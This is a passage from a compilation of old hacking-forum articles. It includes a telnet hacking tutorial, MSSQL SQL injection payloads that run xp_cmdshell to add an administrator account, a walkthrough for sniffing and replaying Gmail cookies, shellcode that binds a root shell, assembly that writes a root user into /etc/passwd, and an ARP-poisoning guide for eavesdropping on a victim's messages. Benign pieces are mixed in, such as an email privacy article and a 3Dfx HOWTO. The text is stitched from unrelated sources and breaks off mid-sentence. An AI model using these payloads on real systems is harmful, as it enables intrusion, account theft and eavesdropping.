the bottom.



2. Press enter.




Congratulations! You just made your first connection! Although it's
not a quantum leap in the exploration of computer security, it's a
start.


~`Doing Something After You Connect


~`CHAPTER FIVE: WHAT TO DO AFTER YOUR CONNECTED`~

~`Doing Something!`~


Alright, so you've got your open connection on an open port. It's best
to keep the connection time down to a minimum to reduce them knowing.
I'll now demonstrate on what to do after you're connected.


1. Generically speaking, typing help will give you a list of all the
commands supported for that Box. However, some require you to log on
before doing so, what a drag!
Alright, after typing help this is how it responded.



You see that there's a nice listing of commands you can use. Since
this port is not pass protected, you have no worries about
restrictions. Typing "help" and then the command in which you want
help on will make it elaborate, which is a great feature for a newbie!
This is a pic of me asking it to elaborate on a few things.




2. You can never forget to say "hello". It's quite rude to run through
someone's home (computer) without even introducing yourself. This
young lady was much nicer after I said "helo" to it.


[NOTE: I lost the pics and I'm too fucking lazy to make a helo pic…
I'm sure you're smart enough to figure it out]


3. Use the commands in the box to figure out what you want to do.
Since every computer and port is different, it is impossible for me to
show you every single thing you can do. Learn to get off your bum and
ask it what some of the commands mean, its a good learning tool.


~`FTP`~

You can also connect to port 21 (FTP, or File Transfer Protocol) using
telnet. Typing help will give you a listing that you nee




~`CHAPTER SIX: CRACKING A PASSWORD`~

~`Brutus`~

Brutus is a great Brute Force password cracker. It is easy to use for
the newbie, fast, and reliable. You can find it by doing a search at
www.google.com for "Brutus".


~`Password Lists`~

I'm proud to announce that two of our TGS members, The_IRS and
Computer Geek, have combined many lists and have came out with a
password list with a total of 2.1 passwords. You can download it here:
http://www.aftdesign.com/hacking/passwords.html


~`Default Passwords`~

You can find many lists of default passwords for any operating systems
on the web. Doing a search at google.com for "Default Password Lists"
will come in handy. Here is a very good site with many default
passwords that you can access in the meantime:
http://www.phenoelit.de/dpl/dpl.html



~`CHAPTER SEVEN: FAQ`~

1. "I Get A Blank Screen After Connecting!"

The port that your connecting to is 'dead', or unusable. This could be
due to a number of different things. For instance, lets say that your
trying to connect to someones computer through telnet, on the kazza
port (which I beleive is 1214). This port is not designed to take
packets (data) from the telnet program, and is specifically designed
to give and receive packets (data) from the kazza program. This could
be one of your problems. Trying to connect to a backdoor for a Sub7
program will also do the same.


2. "It Says I Can't Connect! WTF!"

This is because the port is either closed, or the computer is firewall
protected. As a newbie I wouldn't suggest messing with it.



3. "My Computer Flips Off After Connecting!"

I'll bet money your using Windows. You are aren't ya? I knew it! This
is a Windows Dump File. Either update Windows, get Linux, or forget
hacking.



4. "Where Can I Type My Commands?"

Type a few letters to see where they commands will show up. Most
likely it will be at the bottom of the Command Prompt/MS DOS screen.



5. "I Got Arrested!!! Can I Sue You?"

NO! You read my disclaimer at the top. I don't care who you are, I'm
not taking responsibility.



C9* Romeo

SQL Injection Vulnerabilities in MSSQL

This method of SQL injection in Microsoft SQL involves injecting a query that attempts converting an sql query to an interger value using convert() though fails, resulting in an error message including the result of the SQL query. This allows an attacker to execute SQL queries on a server.

To test whether a variable is vulnerable to this type of injection, insert a ' onto the end of the value of a variable that acts with the db server, for example: index.asp?id=100' if the site is vulnerable to to this type of attack the page should produce an error msg that looks similiar to this:

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string

This allows you to execute sql queries to do tasks such as map out the tables and collumns in the database allowing them to get their hands on all information inside the DB.

convert(int, (select top 1 name from sysobjects where xtype='U' and name>'tablename'))
replacing tablename each time with the table name you get. Say for example from running that query you got a result of the table 'news' you'd run convert(int, (select top 1 name from sysobjects where xtype='U' and name>'news')) this would give you the next table in the database, and so on.

Then it's possible to get the collumns inside a table by using:

convert(int, (select top 1 name from syscolumns where colid=1 and id=(select top 1 id from sysobjects where xtype='U' and name='TABLE')))

obviously replacing TABLE with the table of your choice and colid=1 then colid=2 etc. until all collumns have been found. Of course then with basic SQL knowlege you can extend on this alot.

If the user running the SQL server is 'dbo' (database owner) this opens up alot more possibilities including blind command exection using EXEC. To test whether a server is running under DBO you'd run:

page.asp?vuln=convert(int,user)

while it's DBO you can use this privilege to execute commands on the server allowing you to do things such as start or stop services, add a user account to the system and even escalate privileges to administrator as the db server is running as sysadmin.

page.asp?vuln=1;exec master..xp_cmdshell 'net users username password /add';--
page.asp?vuln=1;exec master..xp_cmdshell 'net localgroup Administrators username /add';--

after this, it's pretty useful to check if remote desktop, telnet are running etc.

If not you could start it yourself

This shows how clearly stupid it would be to run your db under 'dbo'.

A few things you can do to prevent this type of SQL attack are filtering out characters such as quote marks - single and double, the semi colon and even slash and backslash and just generally tightening user input.

Sniff Gmail cookies

Today i will Teach u how to Sniff Gmail cookies in Unsecured Wireless network using Wifizoo tool in Backtrack 3

1) mkdir /root/Desktop/wifizoo
2) cd /root/Desktop/wifizoo
3) wget http://wifizoo.info/wifizoo_black_v1.3.tar.bz2
4) tar jxvf wifizoo_black_v1.3.tar.bz2
5) cd /root/Desktop/wifizoo/wifizoo_black_v1.3

Now we'll open the file with kwrite wifizoo.py (python script language) and modify it to match with the interface u use. at the row 50 , it will indicate the interface,
as my card is RT 73 Chipset i use rausb0

Code:

6) conf.iface = 'rausb0?

then make sure u make ur wifi card in Monitor mode

run this command in another Terminal

7) airmon-ng start rausb0

and then monitor the Access Points

8) airodump-ng rausb0

then come back to 1st terminal

and type this command

9) python wifizoo.py -i rausb0 (your Interface)

It can be seen that interface wifizoo launches web port 8000 on the local server and the proxy is available on port 8080.
This will be very useful in the future First, let us connect to wifizoo control panel with firefox:

10)firefox 127.0.0.1:8000

And here's administrative interface Wifizoo

We get down to business by clicking on "Cookies":

heyyy Wifizoo has captured cookies, you can see the image on a cookie google mail.
Before you can use these cookies, you must configure Firefox to connect through proxy turning locally on port 8080. It is in Edit, Preferences, Network, check on Manual proxy configuration and configure the HTTP proxy on port 8080, then

We can now return to the "Cookies" panel Wifizoo hotel. By clicking on the cookie gmail (all information about the cookie, in blue), wifizoo will automatically build on the currently used proxy on port 8080. The indication "Cookie Set!" shows that the cookie has been forged and can be reused>

Then simply click jump to it will take u to Google.com then click mail.

you r done u have Sniffed others cookies.

So never use Unsecure Wireless Networks,

Be secure Stay secure ;)

Reguards : C9* Romeo

Shellcodes - How They Work?

It's not an easy task to find a vulnerable service and find an exploit for it. It's also not easy to defend against users who might want to exploit y
our system, if you are a system administrator. However, writing an exploit by yourself, to convert a news line from bug tracker into a working lockpic
k, is much more difficult. This article is not a guide on writing exploits, nor an overview of popular vulnerabilities. This is a step-by-step guide o
n developing a shellcode, a crucial point of any exploit software. Hopefully, learning how they work will help conscientious and respectable developer
s and system administrators to understand how malefactors think and to defend their systems against them.
How an Exploit Works

Take any exploit downloaded from the internet that promises you an easy root shell on a remote machine, and examine its source code. Find the most un
intelligible piece of the code; it will be there, for sure. Most probably, you will find a several lines of strange and unrelated symbols; som
ething like this:
char shellcode[] =
"\x33\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8a"
"\xd4\xf2\xe7\x83\xeb\xfc\xe2\xf4\xbb\x0f\xa1\xa4\xd9\xbe\xf0\x8d"
"\xec\x8c\x6b\x6e\x6b\x19\x72\x71\xc9\x86\x94\x8f\x9b\x88\x94\xb4"
"\x03\x35\x98\x81\xd2\x84\xa3\xb1\x03\x35\x3f\x67\x3a\xb2\x23\x04"
"\x47\x54\xa0\xb5\xdc\x97\x7b\x06\x3a\xb2\x3f\x67\x19\xbe\xf0\xbe"
"\x3a\xeb\x3f\x67\xc3\xad\x0b\x57\x81\x86\x9a\xc8\xa5\xa7\x9a\x8f"
"\xa5\xb6\x9b\x89\x03\x37\xa0\xb4\x03\x35\x3f\x67";

This is shellcode, also sometimes referred to as "bytecode." Its content is not a magic word or random symbols. This is a set of low-level machine co
mmands, the same as are in an executable file. This example shellcode opens port 4444 on a local linux box and ties a Bourne shell to it with root pri
vileges. With a shellcode, you can also reboot a system, send a file to an email, etc. The main task for an exploit program is therefore to make this
shellcode work.

Take, for example, a widely known error-buffer overflow. Developers often check data that has been received as input for functions. A simple example{
: } the developer creates a dynamic array, allocates for it 100 bytes, and does not control the real number of elements. All elements that are out of
the bounds of this array will be put into a stack, and a so-called buffer overflow will occur. An exploit's task is to overflow a buffer and, after t
hat, change the return address of system execution to the address of the shellcode. If a shellcode can get control, it will be executed. It's pretty s
imple.

As I already said, this article is not a guide for writing exploits. There are many repositories with existing shellcodes (shellcode.org, Metasploit)
; however, it is not always enough. A shellcode is a low-level sequence of machine commands closely tied to a dedicated processor architecture and
operating system. This is why understanding how it works can help prevent intrusions into your environment.
What Is It For?

To follow along, I expect you to have at least minimal assembly knowledge. As a platform for experiments, I chose Linux with a 32-bit x86 processor.
Most exploits are intended for Unix services; therefore, they are of most interest. You need several additional tools: Netwide Assembler (nasm
), ndisasm, and hexdump. Most Linux distributions include these by default.
The Process of Building

Shellcode stubs are usually written in assembler; however, it is easier to explain how one works by building it in C and then rewriting the same
code in assembly. This is C code for appending a user into /etc/passwd:
#include
#include

main() {
char *filename = "/etc/passwd";
char *line = "hacker:x:0:0::/:/bin/sh\n";
int f_open;
f_open = open(filename,O_WRONLY|O_APPEND);
write(f_open, line, strlen(line));
close(f_open);
exit(0);
}

All of the code is pretty simple, except maybe the open() function. The constant O_WRONLY|O_APPEND given as a parameter opens the file fact for writi
ng and appends the new data to the end of the file.

Here is a more usable example: executing a Bourne shell:
#include

main() {
char *name[2];
name[0] = "/bin/sh";
name[1] = NULL;
setreuid(0, 0);
execve(name[0],name, NULL);
}

The setreuid(0,0) call attempts to obtain root privileges (if it is possible). execve(const char filename,const char[] argv, const char[{
] } envp) is a main system call that executes any binary file or script. It has three parameters: filename is a full path to an executable file,
argv[] is an array of arguments, and envp[] is an array of strings in the format key=value. Both arrays must end with a NULL element.

Now consider how to rewrite the C code given in the first example in assembly. x86 assembly executes system calls with help of a special system inter
rupt that reads the number of the function from the EAX register and then executes the corresponding function. The function codes are in the file /usr
/include/asm/unistd.h. For example, a line in this file, #define __NR_ open 5, means that the function open() has the identification number 5. In a si
milar way, you can find all other function codes: exit() is 1, close() is 6, setreuid() is 70, and execve() is 11. This knowledge is enough to wri
te a simple working application. The /etc/passwd amendment application code in assembly is:
section .data
filename db '/etc/passwd', 0
line db 'hacker:x:0:0::/:/bin/sh',0x0a

section .text
global _start

_start:
; open(filename,O_WRONLY|O_APPEND)
mov eax, 5
mov ebx, filename
mov ecx, 1025
int 0x80
mov ebx, eax

; write(f_open, line, 24)
mov eax, 4
mov ecx, line
mov edx, 24
int 0x80

; close(f_open)
mov eax, 6
int 0x80

; exit(0)
mov eax, 1
mov ebx, 0
int 0x80

It's a well-known fact that an assembly program consists of three segments: the data segment, which contains variables; the code segment cont
aining code instructions; and a stack segment, which provides a special memory area for storing data. This example uses only data and code segment
s. The operators section .data and section .text mark their beginnings. A data segment contains the declaration of two char variables: name and li
ne, consisting of a set of bytes (see the db mark in the definition).

The code segment starts from a declaration of an entry point, global _start. This tells the system that the application code starts at the _start lab
el.

The next steps are easy; to call open(), set the EAX register to the appropriate function code: 5. After that, pass parameters for the functi
on. The most simple way of passing parameters is to use the registers EBX, ECX, and EDX. EBX gets the first function parameter, the address of the beg
inning of the filename string variable, which contains a full path to a file and a finishing zero char (most system functions operating with strings d
emand a trailing null). The ECX register gets the second parameter, giving information about file open mode (a constant O_WRONLY|O_APPEND in a numeric
format). With all of the parameters set, the code calls interrupt 0x80. It will read the function code from EAX and calls an appropriate function. Af
ter completing the call, the application will continue, calling write(), close(), and exit() in exactly the same way.

Understanding Email Security Anonimity

When we are talking about protecting email privacy and anonymity we consider that it can be compromised by message interception or an email message contains information that the sender was not intending to pass to the recipient. In this article we will try to explain how email system works, what information can be extracted from regular email message, and how email privacy can be protected.

1. Email privacy - how can it be compromised?

Before we continue with topics on how to protect email privacy, we should understand how the email system works and what are the issues related to email privacy.

How the email system works.
Most common way of sending email is using the ISP (Internet Service Provider) or company mail server. When you click on "send" button, your email software will establish an SMTP (SMTP stands for Simple Mail Transfer Protocol) connection to your email server. Server will attempt to deliver a message directly to your recipient ISP mail server, but in case this server is not accessible at the moment it will deliver the message to the intermediate email server known as MX relay host. After traveling through the MX hosts, message will be delivered to recipient mailbox on his/her ISP mail server. It will be stored there until your recipient retrieves the message using POP (Post Office Protocol) or IMAP (Internet Message Access Protocol) protocol. This is how your email message travels through the Internet from the sender's computer to the recipient's computer. The same way web mail service work, but instead of email software you would need to use web interface to compose or read emails.

How can an email message be intercepted?
Where it can be intercepted? It can be intercepted at each step along the way. Email message is stored on two servers on its way at least: on sender ISP mail server and on recipient ISP mail server. When traveling through the MX hosts, message is stored on each of MX hosts. When your mail is addressed to the bank, investment company, business partners, it can attract attention of IT staff that perform mail server monitoring. And there is nothing that can prevent unscrupulous IT staff with access to the mail server to open and read that message. Other problem is that unauthorized personnel or hackers can have access to the mail server where physical access security and network security are weak.
There is another way to intercept email messages: network traffic interception. In most cases network traffic monitoring is performed by government agencies at ISP level. Email traffic can be rated according to keywords to "suspicious" and stored for later review by government agencies staff – this is how US Carnivore system works.

Email headers anonymity.
When analyzing email message we can get lot of information about its sender. Computer IP address, geographic location, time zone, language preferences, computer LAN name, email software used etc., – all this information can be found in email message. And an important point is that all this info is being passed without sender's knowing about it. Well, what is bad about it, you can ask. This will depend on the way this information can be used. For example, you may not wish your recipient to know that your operating system uses Dutch language as default (e.g. your native language is Dutch), or that you are in Australia now and use one of the local ISPs services. All this information can be easily extracted from the email message headers.
Every email message consists of two parts: message header and message body.
Header part can be compared to a letter envelope. It contains message subject, sender's and recipient's email addresses, date and time message was sent and arrived, lists the points your message went through on its way to recipient. Message headers also contain service information about sender's email software. This information is used to deliver message, and allow tech staff to debug email problems when they occur.

Here is an example message headers:

Return-Path:
Received: from [192.168.157.3] by web5203.mail.foobar.com; Sat, 21 Nov 2003 12:42:20 –0800 PST
Message-ID: <2003114546184545.45639.qmail@foobar.com>
Date: Sat, 21 Nov 2003 12:42:20 -0800 (PST)
From: "Peter J. Smith"
Subject: My Private Message
To: example@yahooo.com
MIME-Version: 1.0
Content-Type: text/html;charset="GB2312"
X-Mailer: Microsoft Outlook Express 5.00.2615.2000




And here is the information we can extract from the headers (using it to draw a picture of the sender):
Sender IP address: [192.168.157.3] points to the sender's computer. Anyone can get further details about ISP (address, phone, fax, email) running a search through the WHOIS databases.
Sender ISP: "web5203.mail.foobar.com" and "@foobar.com" – message was sent using web interface from foobar.com (further details available at the website)
Senders email software: Microsoft Outlook Express 5.00.2615.2000 (this version's known bugs could be used for sending a troyan to the computer)
Senders local time zone: -0800 (PST) US Pacific coast (points to the geographic location of the computer)
Senders native language: charset="GB2312" – Chinese char set (the user's probably a member of the local Chinese community)

It should be noted, that only three lines in the message headers were explicitly supplied by the sender: "from" address, "to" address and "subject" line. All other data was inserted by email software and intermediate servers. Usually users have no control over these headers, but these headers are the most dangerous for email privacy and contain lot of information about the sender. There is no problem to track the message sender using headers data.

Secure email software.
Using right email software is an important point for email security. If you are using buggy email software you are open to hacker attacks since email message contains your email software vendor and version number. There will be enough info to write a specially formatted (to use your email software security vulnerabilities) message to hung your computer or infect it by Trojan. If somebody suspects you to store confidential information on your computer he/she can try to hack in to get it. All the attacker needs to start is your IP address from email message header. Using security holes in your computer software (new Windows vulnerabilities are published almost daily) attacker can gain full access to your computer and in worst case obtain all your email passwords, banking and investment account data, private correspondence, business data etc. All this horror scenarios are not a myth but today's reality, just search on Google on companies offering spying over the Internet. If your competitors can afford spending hundred dollars to know your secrets you are in danger.

Web bugs.
How can be web browsing related to emailing you may ask? It's simple. Most of email applications are capable to display HTML formatted email messages. This is not different from viewing a regular web page, but the web page is displayed in your email software window, not in a browser. When viewing web pages in your email window you are taking the same risk as when browsing, e.g. you have to deal with cookies, Java Scripts, Java, ActiveX controls, etc. IP anonymity and data interception issues should be taken into consideration as well.

There is one popular spying technique: web bugs. To illustrate how they work let us imagine that you are running some online business and have received an email message (possibly business related) form some unknown person:

From: someuser@yahoo.com
To: customer@foobar.com
Subject: Hello!
Hello!
How are you?
I'm fine.
David.




To attract your attention your full name or your company name can be written in "Subject" line. You have opened this message, and after reading it and considering it to be spam you through it away. But you have not noticed that the message was HTML formatted, and it contained an image. Dot symbol after the word "fine" was replaced by a small image, and that image was automatically downloaded from some website by your email software when you had opened the message. Now, the email sender after analyzing web server logs can get some information on you: date and time you have read this email, your IP address, operating system, etc.
All this means that your email privacy can be compromised when you simply open an email message, even without replying to it.

2. How to protect your email privacy.
Even if you have nothing to hide it is a good idea to take care of your email privacy. We have developed recommendations on how to make emailing secure and private as much as possible.

2.1 Use encryption to protect your email messages. The only way to protect email messages from the interception is to encrypt them. There are few techniques to do so.

* PGP and S\MIME encryption. Both PGP and S\MIME encryption are used to encrypt message body only, leaving message headers unprotected. PGP and S\MIME can be used if you require end-to-end encryption. Using those methods requires prior agreement between parties, and "public key" exchange should be done before emailing securely.
* SSL encrypted connection to mail server. SSL can be successfully used to encrypt email traffic in the whole. SSL encrypted transport prevents from message headers and message body interception on the way to/from the mail server while sending/receiving email. SSL can be used to effectively protect from intercepting your email traffic by ISP or government agencies.

Please note, PGP and S\MIME do not provide anonymity. Even if you encrypt email messages with PGP or S/MIME the message headers still remain open, and will be transferred in clear text through the Internet. You have to understand that unencrypted "To:", "From:", "Subject:", etc. fields may disclose your identity and can contain confidential information. In addition to PGP or S/MIME, SSL connection

Cable Modem uncapping

n the beginning there was dial-up, and it was slow; then came broadband in the form of cable, which redefined how we access the internet, share information, and communicate with each other online. Hacking the Cable Modem goes inside the device that makes Internet via cable possible and, along the way, reveals secrets of many popular cable modems, including products from Motorola, RCA, WebSTAR, D-Link and more.

Inside Hacking The Cable Modem, you'll learn:
# the history of cable modem hacking
# how a cable modem works
# the importance of firmware (including multiple ways to install new firmware)
# how to unblock network ports and unlock hidden features
# how to hack and modify your cable modem
# what uncapping is and how it makes cable modems upload and download faster

Written for people at all skill levels, the book features step-by-step tutorials with easy to follow diagrams, source code examples, hardware schematics, links to software (exclusive to this book!), and previously unreleased cable modem hacks.





http://rapidshare.com/files/90108577/Hacking_The_Cable_Modem.rar

Setting up a reverse SSH tunnel - Linuk

Takeaway:
Learn to forward a port on a remote machine to a local machine while initiating the SSH tunnel from the local machine.

SSH is an extremely useful tool in that it allows you to do many things in a secure fashion that you might not otherwise be able to do. One of the things SSH allows you to do is to set up a reverse encrypted tunnel for data transfer. Typically, when you initiate an SSH tunnel, you forward a port on the local machine to a remote machine which can allow you to connect to an insecure service in a secure way, such as POP3 or IMAP. However, you can also do the reverse. You can forward a port on the remote machine to the local machine while still initiating the tunnel from the local machine.

This is useful if you have a service on the remote end that you want to have connected to something on the local machine, but you don't wish to open up your firewall or have SSH private keys stored on the remote machine. By using a reverse tunnel, you maintain all of the control on the local machine. An example usage for this would be for logging messages; by setting up a reverse SSH tunnel, you can have a logger on the remote system send logs to the local system (i.e., syslog-ng).

To set up the reverse tunnel, use:


$ ssh -nNT -R 1100:local.mydomain.com:1100 remote.mydomain.com


What this does is initiate a connection to remote.mydomain.com and forwards TCP port 1100 on remote.mydomain.com to TCP port 1100 on local.mydomain.com. The "-n" option tells ssh to associate standard input with /dev/null, "-N" tells ssh to just set up the tunnel and not to prepare a command stream, and "-T" tells ssh not to allocate a pseudo-tty on the remote system. These options are useful because all that is desired is the tunnel and no actual commands will be sent through the tunnel, unlike a normal SSH login session. The "-R" option tells ssh to set up the tunnel as a reverse tunnel.

Now, if anything connects to port 1100 on the remote system, it will be transparently forwarded to port 1100 on the local system.

mitm by arp poisoning - Linuk

Well I noticed the linux area kinda empty so I decided to fix that ^_^ with a little something I pulled in teh last few days. First of all you should understand how Local Area Netowrks (LANs) work. On a hubbed network (or an 802.11 wireless one) when a computer sends data to another one, teh hub sends that data to ALL hosts in the network while only the intended reciecver accepts it while all the others just drop it. Running a sniffer such as ethereal on a hubbed network (which sets your NIC into promiscuous mode) captures all that data that should be discarded and lets you view it. On switched networks though things are more secure. A switch only sends data to the intended reciever . To do this, hosts on a LAN use a protocol caled ARP (Address Reslution Protocol) which translated IP addresses on a LAN to MAC addresses (a supposedly unique address to each NIC, there are ways of spoffing your MAC address though). Let's say teh switch would recieve a piece of data and wants to send it to 192.168.0.2, it has to know which port to send it to (i mean a physical port on the switch, not your virtual ports), in other words on which wire to transmit it. So the host which sends the data broadcasts an ARP request like: "Who has 192.168.0.2 gimme your MAC address" to which 192.168.0.2 would respond "I'm 192.168.0.2, my MAC address in AA:BB:CC:11:22:33" (completely bogus MAC address used there for demonstrtive purposes) and then the host would send that data to the switch(along with the destination MAC address) and the switch to the intended MAC address. One flaw in ARP is that it considers ALL responses valid, so it doesn't need to send a request to get an answer. It just considers ALL answers valid. So if I were to keep sending specially crafted arp responses to a host saying "I'm 192.168.0.2, my mac address is AA:BB:CC:44:55:66" then all packets from that host destined for 192.168.0.2 would be rerouted to me. That's coz as I send these packets continuously and 192.168.0.2 only sends 1 when it's asked for it, the host recieves more packets from me before it gets to send that data so it ends up sending it to the latest MAC address for 192.168.0.2 (this is called arp poisoning). Now MITM stands for Man-In-The-Middle. An attack of this nature means turning your computer into an invisible proxy between to other computers, basically turning:

192.168.0.2<-------->192.168.0.3 into
192.168.0.2<--->my_ip_address<--->192.168.0.3

This can be accomplished by arp poisoning the 2 hosts and forwarding the recieved packets. To do a MITM between 192.168.0.2 and 192.168.0.3 you'd arp poison 192.168.0.2 into thinking you're 192.168.0.3 and 192.168.0.3 into thinking you're 192.168.0.2 and DON'T FORGET to turn on packet forwarding coz if you don't you kill the connection between the 2 hosts. Next up i'm gonna show you how to sniff packets between 2 hosts on teh same LAN using 'arpspoof' and 'ethereal'. Arpspoof is found in the 'dsniff' package and ethereal comes with almost every Linux distro. For this example I used the auditor boot cd which can be found at remote-exploit.org . What I wanted to do was listen in on Yahoo Messenger convos. So I did teh following:

First I turned on ip forwarding 'echo 1 > /proc/sys/net/ipv4/ip_forward'
Then I chose my victim , at the time I knew 192.168.0.5 was having a YahooMesenger convo so I did:
'arpspoof -t 192.168.0.5 192.168.0.99' which makes 192.168.0.5 believe that i'm 192.168.0.99, sending all packets with destination 192.168.0.99 to me. Now 192.168.0.99 is teh gateway in my LAN so it's our link with the internet therefore all packets for YahooMessenger must pass through it.

Then I did:

'arpspoof -t 192.168.0.99 192.168.0.5' which makes all packets from the internet to 192.168.0.5 pass through me (now if I didn't do this i'd only get half the conversation, what 192.168.0.5 sends,to be exact).

Now I turned on ethereal and started capturing all packets which pass through eth0 (my only NIC) and selected real-time update for the captured packets (coz I want my list of captured packets updated as tehy are captured). The following list should flood with packets (mostly ARP packets coz you send tons of them out), so it was a good idea to select the filter 'YMSG' which only shows you teh yahoo meseneger packets. A good option is to get teh 'ngrep' utility if you wanna sniff out for certain keywords. 'ngrep pass' would show me all packets containing the string 'pass' and the 'dsniff' utility which automatically looks for HTTP, FTP, POP3 etc passwords and displays them in a readable context. Another good utility found on the auditor cd id 'webspy' which redirects your netscape browser to URLs sniffed from captured packets, allowing you to surf in parallel with the victim (a cool party trick lol ). If you have any questions on this article don't hesitate to PM me.

Translating DOS to Linux

DOS Command: dir, dir/w
Linux Equivalent: ls, ls -l

DOS Command: chdir (Current directory)
Linux Equivalent: pwd

DOS Command: del (remove a file)
Linux Equivalent: rm

DOS Command: deltree (remove a directory and all files under it)
Linux Equivalent: rm -r

DOS Command: copy
Linux Equivalent: cp

DOS Command: xcopy (copy all files in a directory and under it)
Linux Equivalent: cp -R

DOS Command: rename, move
Linux Equivalent: mv

DOS Command: type (print contents of a file to the screen)
Linux Equivalent: cat

DOS Command: help, /?
Linux Equivalent: man

DOS Command: cls (clear screen)
Linux Equivalent: clear

DOS Command: find (search for a word or words in a specified file)
Linux Equivalent: grep

DOS Command: fc (compare two files and find differences between them)
Linux Equivalent: diff

DOS Command: set (show environment variables)
Linux Equivalent: env

DOS Command: set variable (set environment variable)
Linux Equivalent: export

DOS Command: edit filename
Linux Equivalent: vi filename, pico filename, nano -w filename (varies based on editor of choice)

DOS Command: attrib +h filename (makes a file hidden)
Linux Equivalent: mv file .file

DOS Command: mem (displays available memory)
Linux Equivalent: free, top

DOS Command: scandisk
Linux Equivalent: fsck

DOS Command: defrag c:\
Linux Equivalent: debugfs

DOS Command: format
Linux Equivalent: mke2fs, mk32fs -j, mkreiserfs, mkswap, etc. (varies based on desired filesystem)

DOS Command: pkzip (creates archive of file)
Linux equivalent: tar, used often in conjunction with gzip for compression)

DOS Command: tracert
Linux Equivalent: traceroute

DOS Command: ipconfig (check IP address and network settings)
Linux Equivalent: ifconfig

DOS Command: nbtstat -a hostname (get DNS info for specified host)
Linux Equivalent: nslookup hostname

DOS Command: route print (display routing table)
Linux Equivalent: route -n

DOS Command: net send host/ip message send message to another computer
Linux Equivalent: smbclient -M Windows Host, talk (Linux hosts)

3Dfx graphics accelerator chip support for Linux.

1. Introduction

This is the Linux 3Dfx HOWTO document. It is intended as a quick
reference covering everything you need to know to install and
configure 3Dfx support under Linux. Frequently asked questions
regarding the 3Dfx support are answered, and references are given to
some other sources of information on a variety of topics related to
computer generated, hardware accelerated 3D graphics.

This information is only valid for Linux on the Intel platform. Some
information may be applicable to other processor architectures, but I
have no first hand experience or information on this. It is only
applicable to boards based on 3Dfx technology, any other graphics
accelerator hardware is beyond the scope of this document.



1.1. Contributors and Contacts

This document would not have been possible without all the information
contributed by other people - those involved in the Linux Glide port
and the beta testing process, in the development of Mesa and the Mesa
Voodoo drivers, or rewieving the document on behalf of 3Dfx and
Quantum3D. Some of them contributed entire sections to this document.

Daryll Strauss daryll@harlot.rb.ca.us did the port, Paul J. Metzger
pjm@rbd.com modified the Mesa Voodoo driver (written by David
Bucciarelli tech.hmw@plus.it) for Linux, Brian Paul brianp@RA.AVID.COM
integrated it with his famous Mesa library. With respect to Voodoo
Graphics (tm) accelerated Mesa, additional thanks has to go to Henri
Fousse, Gary McTaggart, and the maintainer of the 3Dfx Mesa for DOS,
Charlie Wallace Charlie.Wallace@unistudios.com. The folks at 3Dfx,
notably Gary Sanders, Rod Hughes, and Marty Franz, provided valuable
input, as did Ross Q. Smith of Quantum3D. The pages on the Voodoo
Extreme and Operation 3Dfx websites provided useful info as well, and
in some case I relied on the 3Dfx local Newsgroups. The Linux glQuake2
port that uses Linux Glide and Mesa is maintained by Dave Kirsch
zoid@idsoftware.com. Thanks to all those who sent e-mail regarding
corrections and updates, and special thanks to Mark Atkinson for
reminding me of the dual cable setup.

Thanks to the SGML-Tools package (formerly known as Linuxdoc-SGML),
this HOWTO is available in several formats, all generated from a
common source file. For information on SGML-Tools see its homepage at
pobox.com/~cg/sgmltools.



1.2. Acknowledgments

3Dfx, the 3Dfx Interactive logo, Voodoo Graphics (tm), and Voodoo Rush
(tm) are registered trademarks of 3Dfx Interactive, Inc. Glide,
TexUS, Pixelfx and Texelfx are trademarks of 3Dfx Interactive, Inc.
OpenGL is a registered trademark of Silicon Graphics. Obsidian is a
trademark of Quantum3D. Other product names are trademarks of the
respective holders, and are hereby considered properly acknowledged.


1.3. Revision History


Version 1.03
First version for public release.

Version 1.16
Current version v1.16 6 February 1998.



1.4. New versions of this document

You will find the most recent version of this document at
www.gamers.org/dEngine/xf3D/.

New versions of this document will be periodically posted to the
comp.os.linux.answers newsgroup. They will also be uploaded to various
anonymous ftp sites that archive such information including
ftp://sunsite.unc.edu/pub/Linux/docs/HOWTO/.

Hypertext versions of this and other Linux HOWTOs are available on
many World-Wide-Web sites, including sunsite.unc.edu/LDP/. Most Linux
CD-ROM distributions include the HOWTOs, often under the
/usr/doc/directory, and you can also buy printed copies from several
vendors.

If you make a translation of this document into another language, let
me know and I'll include a reference to it here.



1.5. Feedback

I rely on you, the reader, to make this HOWTO useful. If you have any
suggestions, corrections, or comments, please send them to me (
bk@gamers.org), and I will try to incorporate them in the next
revision. Please add HOWTO 3Dfx to the Subject-line of the mail, so
procmail will dump it in the appropriate folder.

Before sending bug reports or questions, please read all of the
information in this HOWTO, and send detailed information about the
problem.

If you publish this document on a CD-ROM or in hardcopy form, a
complimentary copy would be appreciated. Mail me for my postal
address. Also consider making a donation to the Linux Documentation
Project to help support free documentation for Linux. Contact the
Linux HOWTO coordinator, Tim Bynum (linux-howto@sunsite.unc.edu), for
more information.



1.6. Distribution Policy

Copyright (c) 1997, 1998 by Bernd Kreimeier. This document may be
distributed under the terms set forth in the LDP license at
sunsite.unc.edu/LDP/COPYRIGHT.html.

This HOWTO is free documentation; you can redistribute it and/or
modify it under the terms of the LDP license. This document is
distributed in the hope that it will be useful, but without any
warranty; without even the implied warranty of merchantability or
fitness for a particular purpose. See the LDP license for more
details.



2. Graphics Accelerator Technology

2.1. Basics

This section gives a very cursory overview of computer graphics
accelerator technology, in order to help you understand the concepts
used later in the document. You should consult e.g. a book on OpenGL
in order to learn more.


2.2. Hardware configuration

Graphics accelerators come in different flavors: either as a separate
PCI board that is able to pass through the video signal of a (possibly
2D or video accelerated) VGA board, or as a PCI board that does both
VGA and 3D graphics (effectively replacing older VGA controllers).
The 3Dfx boards based on the Voodoo Graphics (tm) belong to the former
category. We will get into this again later.


If there is no address conflict, any 3D accelerator board could be
present under Linux without interfering, but in order to access the
accelerator, you will need a driver. A combined 2D/3D accelerator
might behave differently.


2.3. A bit of Voodoo Graphics (tm) architecture

Usually, accessing texture memory and frame/depth buffer is a major
bottleneck. For each pixel on the screen, there are at least one
(nearest), four (bi-linear), or eight (tri-linear mipmapped) read
accesses to texture memory, plus a read/write to the depth buffer, and
a read/write to frame buffer memory.

The Voodoo Graphics (tm) architecture separates texture memory from
frame/depth buffer memory by introducing two separate rendering
stages, with two corresponding units (Pixelfx and Texelfx), each
having a separate memory interface to dedicated memory. This gives an
above-average fill rate, paid for restrictions in memory management
(e.g. unused framebuffer memory can not be used for texture caching).

